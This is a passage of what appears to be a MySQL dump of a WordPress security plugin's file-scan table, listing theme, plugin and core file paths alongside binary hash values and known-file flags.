�','',0,'?'),('H�@C�_Ӭ��*�S�','wp-includes/wp-includes/js/dist/format-library.js',0,'�ԯ䠦_��P^����','�ԯ䠦_��P^����','#H����X�{��M\'���%��&6�D.̺x','',0,'?'),('H�)�f�D<�\ZbH���','wp-content/themes/advance/inc/kirki/includes/class-kirki-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=^%UXAa\Z���)Q�','�uL��(n��Z]�\Z��3�Q֚�I\"�a�','',0,'?'),('H��Y6o��D{�LH��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u.S��y�l�=\0C�>','�?�\\x`��Q�=���8:�v�sT��','',0,'?'),('H�͛�&����;�fY7','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�/��h<��U��','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('H�h]x�O.�:�P��R�','wp-content/themes/sg-window/css/scheme-0.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/+��N�X�m2S','ZqJ�6���P#̵$���v>%�I��,n��?(l','',0,'?'),('Hý��i�Z�U,H�L','wp-admin/includes/meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�4/[\"\r���R�','$Ƙ-����+��_��I�ښi����\r�2��','',0,'?'),('H���C�Tp(^��l�','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Po��3���~��Q','����k��_�?�E�%�Gޓi��BEOyQ��','',0,'?'),('H�fM�+t���~`�i','wp-includes/wp-includes/css/media-views.css',0,'���5w�pأ����','���5w�pأ����','3ֳ���}��!p�B����A����)k�{�F�','',0,'?'),('H��!��[?�z>����','wp-content/plugins/akismet/class.akismet-rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⺅�:K���7&Z9Hc','�*�F��:��Å=IH\'x��\\\"��\'��:','',0,'?'),('H�h���m\\{�����','wp-content/themes/Endolf/FT/js/jquery.minicolors.min.js',0,'\n�-�0��IBg���~','\n�-�0��IBg���~','+�K*�>����^�ƕۏ�f�W�F\rq#��x�','',0,'?'),('H�0Zk�z|� �\r�+','wp-includes/pomo/pomo/plural-forms.php',0,'s_7�;� ]�Lvlɟ','s_7�;� ]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('H�n~�c,�A��h�9��','wp-content/themes/newsmag/assets/vendors/fontawesome/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E@���eR�E�*','��iym딽��B�`��B��`̕�G����','',0,'?'),('I is҉�ȱɁKA�>�','wp-includes/wp-includes/Requests/Transport/fsockopen.php',0,'�>�r�����QHˆV','�>�r�����QHˆV','Xi���c�R�)R�Ǡ�.�#`jjŏ�3?','',0,'?'),('IW�9�a��W��3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\r���rY�VU�f�','��[����핚���\"�M��t��&yָ�IC','',0,'?'),('I�\rf%�y�ܤvO�-','wp-content/themes/anima/admin/images/image-style-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3[����v�,,i�ѽ','�JM l���X\n\'D�Z$�\0�/?�����)���','',0,'?'),('I#M�ͮ�zY��&{�F','wp-content/themes/weblog/assets/js/acme-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�ו�RӍ�tvBY��','�i�R�qx�h�W#�n����4�tQL','',0,'?'),('I/zoeH*�3��9�\n��','wp-content/themes/skt-pathway/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��\rVEj��oB�','�����nǥr7TXŰ\\s�w�������','',0,'?'),('I0��S�$2�T�B*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y N��ɔ]7l�','M�>����f(E���r_hX���oۃ��8@�+O','',0,'?'),('I6.:\n(��i\0B��','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\r\r�0�X/^�0R','O��1�-p�Qۊ��8�Z+�$[��j���K��','',0,'?'),('I6U�\r7����3p�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h<��|�7b����','��_�^F\"��;+r&Z~ӦQ����|�5�','',0,'?'),('IJ�[R]P���|\n�G��','wp-content/themes/spidermag/assets/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j ����\\�\\{ *','.<���\n��qUIn&kv�[�}��v\"�Q��','',0,'?'),('IQM{��:�\r|�6c�e','wp-content/plugins/wp-cerber/assets/flags/il.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��~����3�24�Z�','�b=1<�:�1�ƭ��nn���`�%ޘ��Ϯ�','',0,'?'),('IW����N����}/�','wp-content/themes/capacious/assets/css/responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ᒨ��{a��dv��8','@w�H;9�9��&��RGO)�{�2S�H�U_Ou','',0,'?'),('Ie�x�?��b�T].o','wp-includes/wp-includes/ms-load.php',0,'�),l�\"��?�V�?%','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?'),('IhN�6��_�֚�','wp-content/themes/kidzoo-lite/inc/kidzoo-comment-nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$5�(�d\Z���FH$','I����a�j���Nd� ;���sPj|\"�=&�A�','',0,'?'),('I��:Bs�#���@�','wp-blog-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_BZF1���y����)',';\Z�/\\b���t���I���͝���h��w�','',0,'?'),('I�Ds���6��9Ҋ�','wp-content/themes/maxbusiness/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/b@��_^y�[ŧ�B','�!J=��R#��˳\0�(ljݿtk���z�|','',0,'?'),('I��P��n�','wp-content/themes/hueman/assets/admin/img/hueman-addons-100x100.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?a\r�d���R{�v�ǃ4','�S� ��y��O�M�la��R}��X��GBB��B','',0,'?'),('I��Ҏc�\\R���e�','wp-content/themes/wp-barrister/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�9�>4������8J�','ilz���{��m�U��gƾ�X���I��','',0,'?'),('I��L;/ܣt�\"���k ','wp-includes/wp-includes/SimplePie/gzdecode.php',0,'��rF<�\ZiǨu��','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('I�Ԭ�l��v0O','wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d]Q1g�\0�H.Ǟp','>���Г����c[��Fep�[��zya��oz','',0,'?'),('I��4\r���8�q��&','wp-content/themes/Endolf/inc/extras.php',0,'�r؏�h8h�)/���{','�r؏�h8h�)/���{','\ru�<�\Z�%=;(5�C��m&�c�^�\\a�','',0,'?'),('I�PE�Xt�FH�%�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0��Lv�[c��)?','�C�h!݀F$�}�wd�7b(�!�p�IF.L�','',0,'?'),('I��r%\'��lo�Fh','wp-content/themes/newsmag/assets/sass/mixins/_mixins-master.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�9�ը�x��GpA0','.�q�C-�z !v�ո,�,9����wc�d4�','',0,'?'),('I�V/��6�s��','wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','´R�[��6\\gTԄL_�','�vI\n6��6��%VG��}����@of�e;','',0,'?'),('I�a|�&�]}l?�h���','wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php',0,'b�v�1^l�&)g�4��','b�v�1^l�&)g�4��','-�l����/6�\\����jx�R�\0Ю��~�','',0,'?'),('I�R1\0���K��5�','wp-content/themes/promote/inc/kirki/includes/scripts/class-kirki-scripts-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M�*�=<�\'����&','vX��=�F�H0�.�k����(�`U���','',0,'?'),('J�%.��~�q�l�','wp-includes/class-wp-text-diff-renderer-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����g0HFuI�','�_h+�U��H�i��_��e� w����6��','',0,'?'),('J�k�H\n�)�J�D�','wp-content/themes/maxbusiness/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l��YU�|sVx�R)[A','�$�x��\0��3�pawh{��$���C?L2 oU','',0,'?'),('J?#�͌$M�7�c�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�I.:���`PR�','#z��R�\ZHU���>B�nP,���\'�eT�tߺ','',0,'?'),('Jf�3?���_r�C�','wp-admin/images/w-logo-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���Jvۢ~�y�\\�','n��D��� _�;�!G�םcV�0M9i�=�','',0,'?'),('J��E[�7U��\Z�~','wp-includes/js/plupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�� �~�5��8�ͫ;�','� �\n�Z\rZ�B�[9��z��S)��4M%��','',0,'?'),('JyQl��D�!�HV�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ɩ}�7\"]� Q�P|','�]a��;�tMY^�v�6�j����ꬆ��','',0,'?'),('J4b�Ud�M%d(y','wp-content/themes/capacious/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@ߝ@<q�qIZ��p','7g\"Ov��u\\7;�Ӵ�ϑ�lP7�\\�|\r�!9','',0,'?'),('J6\"����{)�{��|[','wp-content/themes/sg-window/inc/css/page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�Lr�����cK�u','�Xm��l�m�ŕf͋h�B��;�cMK$��','',0,'?'),('J8�E��Dh+���F','wp-admin/js/site-health.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӛ���G��\'W���','���ij��x�\0ךM5+�i���@èQj8�v\"','',0,'?'),('J?�\0O�(����|c�','wp-content/themes/hueman/content-standard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�҉���\"z&{л','�%�Ds�B{�3EqN���w�~&�K���G:�','',0,'?'),('JO�\n�z�E��=٪��','wp-content/themes/hueman/functions/init-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R3FQ��UB��0#�h�','Z�[���IN\0��i�[4�S0�����`�p]7','',0,'?'),('J{�ֹZi^ùx�I','wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�?��T���i�\"=','\"��On]O�k;��Y�}��rG��yf�%�O 8\\','',0,'?'),('J��q������}�','wp-content/themes/Kent/sidebar.php',0,'�3����L��e','�3����L��e','����\\$<�[\"�����hn�7XII�MW�','',0,'?'),('J��Mu���\Z Z�f9m','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',0,'}+#z,��e�rEJ-','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('J�>����\"��/','wp-includes/Requests/Auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��R��W��ÔO[��J','bO�Q�wù�LѠâ��������9Q��lrl','',0,'?'),('J���r�������','wp-content/themes/cactus/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_��5C��$Y�-\r�','�R�.�_`�>���m��\n�o����\\C����','',0,'?'),('J�����Ǵ�Ծ�c�','wp-content/themes/twentynineteen/images/pattern_01.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�;�QB��X����','��(��3�g`&}�5)�s��}me2�G��[�','',0,'?'),('Jլ4��\r�n���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('J뙤%��@�=��(','wp-content/themes/Yegor/aq_resizer.php',0,'ob�t��N�1qg','ob�t��N�1qg','Q6������O�&[쮀ʵ��j���@���?V','',0,'?'),('J��Oh��sDؾ','wp-includes/js/zxcvbn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','| ���#PV /{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('K�,��<�fƑY�','wp-content/themes/twentytwenty/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���<���ȝ���a','ߌ녔B��J+�f�,q*�WC\"^_�V\0.s�@�','',0,'?'),('K���ߺ�b�','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���z�x��C�}','�Nܓ�#d�t�B!\"M՞�==�@o��','',0,'?'),('K0���\r��ܐcn�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�29Y¿,E#�/����','� � ��h<)s��>-P��{���K���I�\0��','',0,'?'),('K41]�ڭ��@�#�','wp-includes/wp-includes/blocks/search.php',0,'էL\n�8���{s���','էL\n�8���{s���','x�\Z�R�>ؼ�:�@3�W@f�e�f����L�','',0,'?'),('K9\'Cs��w0�*o�{','wp-content/themes/advance/inc/kirki/assets/js/postmessage.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�&aJ\\!MK�P�7','���I�0���(\'{���I5o����0[\\x','',0,'?'),('K>�^[�P�F�1�h:','wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0,}J\"��N������','�ޝ�+-%]����ٲ�d�)�_�v?O�(�Y\'\\','',0,'?'),('KKOf�Sd�iB0Ov��','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\j�6Ii��\\u�v','\"9t��Y?�²�L���ykg������=�ۢ�','',0,'?'),('KR��&�J\"_}�3c?�','wp-includes/wp-includes/images/wpspin.gif',0,'hk�u�R�\r@9k���','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('KV�%I��\Z��� ��','wp-content/themes/capacious/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��4yc��{��/+\"','�\\��C1��\nu!���%�Uoz ��M��HVP�','',0,'?'),('KfS�!c#�\\�\ZQ�H','wp-content/themes/advance/css/advance-mobile.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a{������','�9}�81�-�nZ/.�X��N.Ne��N��S(^�','',0,'?'),('Kj\\\"�p�隍Ӥu���','wp-includes/wp-includes/random_compat/cast_to_int.php',0,'�!�>����=I���O','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('KlR9�ʔ���$�<','wp-content/themes/weblog/assets/library/owl-carousel/owl.carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r/�>(���c�p','\"�g����O�Nd���Z�m{x�%��@|:w�','',0,'?'),('K|:t����W�#S㣔','wp-content/themes/advance/inc/kirki/includes/settings/class-kirki-settings-default-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`(��bꂙ�^u\':','�M��ef�>�y�e5���\\�N{$kk��','',0,'?'),('K|�_�dҪ��p�T�','wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js',0,'=B�쟄��P\rL��','=B�쟄��P\rL��','�x[�G��-�90b.z�G��az�>�r','',0,'?'),('K�nҋD&sR�WU(�','wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�^�:�G�(���:k\n','4��7V�f�� �/��������D��W3p','',0,'?'),('K�����կ̺�tл�','wp-includes/wp-includes/js/codemirror/codemirror.min.css',0,'�23j���1��(D��','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('K�ٸ���w��1d�','wp-content/themes/maxbusiness/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^{��p\n4�;�r','���Sˠ ���\0`%�4dT?�����@��P','',0,'?'),('K�?&.ɳ�s�ovR�','wp-content/themes/Yegor/js/jquery.carouFredSel-6.2.1-packed.js',0,'r�_��Q���7!���','r�_��Q���7!���','�;���,^\n<��ĈA\"��Ij\"+��;G�N','',0,'?'),('K���+��)[�NC���','wp-includes/wp-includes/js/json2.js',0,'s��{N�|EO�0�','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('K�c��#2s�/(�\"�','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�E,��ߓ%_�','<6�8��1J�ߧr(;�c�?@�|uR�\nŞ�','',0,'?'),('K��<�H<7�E�,l��','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�p�k�<���#Y','Qx�b���nbWK����E*�l�o��ޅ��ʛ��','',0,'?'),('K��cE�j��zeů�8','wp-includes/block-patterns/text-three-columns-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�tH�W��%���','ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V','',0,'?'),('K��ɹ���jwD�x�','wp-content/plugins/wp-cerber/assets/flags/us.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��V�w\Z]�Ay��','���L�CI`�^�J4�=��0���C�C}�','',0,'?'),('K����\r\\Uz��\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('K��]C��l7:�D\0','wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM�;p8vn��[�S','����9j��lxB�eH:�y�%}�c TP�_�','',0,'?'),('K�.�6���<F��R','wp-includes/wp-includes/js/mediaelement/mediaelement.min.js',0,'-6�������m����','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('K�Lx<C���H��e\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�EN�Ăۛ(\n�n','����Ѭ}^�EF����>��ڂB��','',0,'?'),('KיH˕;SxƯ,��y','wp-content/themes/Endolf/sidebar.php',0,'�$,c�ey����g3\0','�$,c�ey����g3\0','aag7��[�a�e�u9�;��X%Y,T��x�','',0,'?'),('Kಬ�hs�� -�J��','wp-content/themes/Kent/index.php',0,'%M��x^CI�LM���','%M��x^CI�LM���','�Ů�v_�8��\"ӿu��)��0k>�L!c�','',0,'?'),('K�bw��y��.�3�{¥','wp-content/plugins/wp-cerber/assets/flags/pk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����00�%��[.�','Gjۀ���H��$�׃��m\'�^ O�n���','',0,'?'),('K� ���*�;ܼ�nc','wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y��P#����(i�','�D���]^��~��>�r~]�E^anK-qHMe�','',0,'?'),('K��W�&\0\0K�\06�G�','wp-admin/js/set-post-thumbnail.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1N�(�xl�X��\'','v9�\n{lK��~q�#�>��ߦ��� J�`~','',0,'?'),('K��#�]:�Yb�z�','wp-content/themes/kidzoo-lite/inc/kidzoo-tgmpa-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��C��T�X0`V�','�I�ڠ�^���h�;����&�\Z�Ԉ��f�','',0,'?'),('K�K+�2� aeZ�e','wp-includes/class-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I#�h�Z~�����@��','�Xs�W��l����:\"��0����;����LL','',0,'?'),('L�%M��r\0Q�','wp-includes/wp-includes/blocks/social-link/block.json',0,'q�&X�@�$>y�@�','q�&X�@�$>y�@�','�#V�b��v����E\Z\Z6�妅Y9l�\"�s�','',0,'?'),('LRTU��n?bΌ�','wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',0,'f\\�DŽH�$�M(�l�','f\\�DŽH�$�M(�l�','@��3�\nQz�p��\n�j;Q��w��k���13�<','',0,'?'),('L;6w���/�^5�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php',0,'��,�#Y�bu3�����','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY �o��\r����','',0,'?'),('L<#���\Z����}','wp-includes/js/tinymce/skins/lightgray/img/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('L#�Ǜ��z��=~�x�','wp-content/themes/advance/inc/kirki/assets/js/controls/radio-buttonset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0{�I��y���-��1','��pǻ�_o�y���`(.�g��\\�B���,','',0,'?'),('L#��/۰*�3���\r','wp-admin/includes/class-wp-terms-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0Up�\0�.c*�a�','\'�]pn������v�\r>A���;¯P \Z(-��','',0,'?'),('L$]��tr4<,^�[%+|','wp-content/themes/skt-pathway/images/hr_footer.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]P`_�v�����8#7','�?i*�g�\'���=[c|��`zi�c�e�;�YQ�','',0,'?'),('L(��n�9[2�C6�','wp-includes/js/zxcvbn-async.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),('L<K5G��Sq�Tz��','wp-content/themes/weblog/acmethemes/customizer/customizer-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�1|�k�\nR[�','Qi[�X\\�h��`kM5�,0�U����M��M\0','',0,'?'),('L<O�������T^','wp-content/themes/Kent/sponsors.php',0,'����fؘ;��DS�','����fؘ;��DS�','���+�4�\nlj�(�fS�*��hP��|z�','',0,'?'),('LIz���$�R`�+','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif',0,'9K���M�:�Tf�9','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('LR7Q��ToG|�{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�>��&Q)�Fy�k','e�i�p��r9ݴZ\\�\\Q~`�?�7�=�R�','',0,'?'),('Lap���8g�V�,��g�','wp-includes/js/dist/vendor/react-dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('LsЇś\n�c}>�K��','wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`b�L֏�Uy�/','��\r�~�W$A�\"ac�����G<��HZ<�8`','',0,'?'),('Lw+��$�4|�ns�w','wp-content/themes/twentynineteen/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��+�����zg��','@u� |-�\ZK\Zbk�^��R4hM�Ψ����','',0,'?'),('Lz����Z��#�<','wp-includes/class-wp-locale-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('L�\'�P0������','wp-content/themes/sg-window/inc/admin-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�k�H0�4�ح�','�}M��%��3&Ǔ�l�Hqw�RYW�M4:�=��','',0,'?'),('L�����t@m*V�|��\0','wp-includes/wp-includes/js/jquery/ui/accordion.js',0,'������Z����a��','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('L�)P))֗�nS�|�','wp-includes/wp-includes/class-wp-error.php',0,'�l� &�0?&�c~��','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('L��S�h��y����;�','wp-includes/wp-includes/js/customize-base.min.js',0,'�$��r�#��j �','�$��r�#��j �','LF�#�53��uu��t�F �չRk*xs_{E','',0,'?'),('L���\\���\0\0����\0','wp-includes/wp-includes/robots-template.php',0,'�\\��líܓM��','�\\��líܓM��','^�h��Ru�ɆCZ11��S���&̊p0','',0,'?'),('L��d�8�ͽ���h`L�','wp-includes/wp-includes/block-patterns/heading-paragraph.php',0,'����?z�I�����E','����?z�I�����E','�i�,��m�O���#�?Vb�,�C-ܢcž\Zh�','',0,'?'),('L��e�t\"pc( �e�','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yAS9�ie��P�','����I�&���e�*��7�K38�����','',0,'?'),('L�<�)���I6��','wp-content/themes/auberge/template-parts/loop-food-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�U��^�tF3�','�A�¡a�Ve�I$��4���=�/�<ܧǁ�v�','',0,'?'),('Lͧ������O�n7','wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css',0,'���\\PI�ɥ��<\\��','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('L��b�p�_t7tu�8�','wp-content/themes/kidzoo-lite/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�*����&��lS��','vf3.���9q�)��`G���Y*���:�7(9nw','',0,'?'),('Lցߢ�[�>ex�dY','wp-content/themes/event/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bW�8�C#D-�z�|p','zq���pIE�e@~� o8qR��Ȯ','',0,'?'),('L�\r�%��{��','wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�&X�@�$>y�@�','�#V�b��v����E\Z\Z6�妅Y9l�\"�s�','',0,'?'),('L�Ҝ��������h�\n','wp-content/themes/event/js/event-flexslider-setting.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��б��F)��H��Gk�',':��x�F�����3���n���3�m��','',0,'?'),('L�\r��Ȧ:��n�h\'','wp-content/plugins/akismet/_inc/akismet.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�s��r�\n�c�J(','����ra�H�\n��}`�R��N��|���:G','',0,'?'),('L+q�V�;�h��Y�','wp-includes/fonts/dashicons.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���N:��\'�ʤ��ȹ','J��!�����XLl`�e��O��s�H����','',0,'?'),('L�>t���N�����','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5Iה�g,)Z�YM�','�\\k��S�뚑�n wW�� �!�*�~�v��','',0,'?'),('L��)��a$�D-�Ӯ�J','wp-includes/js/tinymce/plugins/wplink/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('M^�͉�5�Dm','wp-content/themes/promote/inc/kirki/assets/scss/controls/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(һ��w�3JRqk','��(�;ȷ|��������i��)B��h�I','',0,'?'),('MR8⬻�,�ͽ�=�S','wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js',0,'K�s(.=����ͪ�','K�s(.=����ͪ�','�a�b��u�7���K\'2��V��=y��','',0,'?'),('Mx1NjTm�R_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'�m�`�0>�+#��','���������p������Pv?Z�F��QQcj','',0,'?'),('M�CـB �g\r����t','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-switch-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>jL�1�K��r 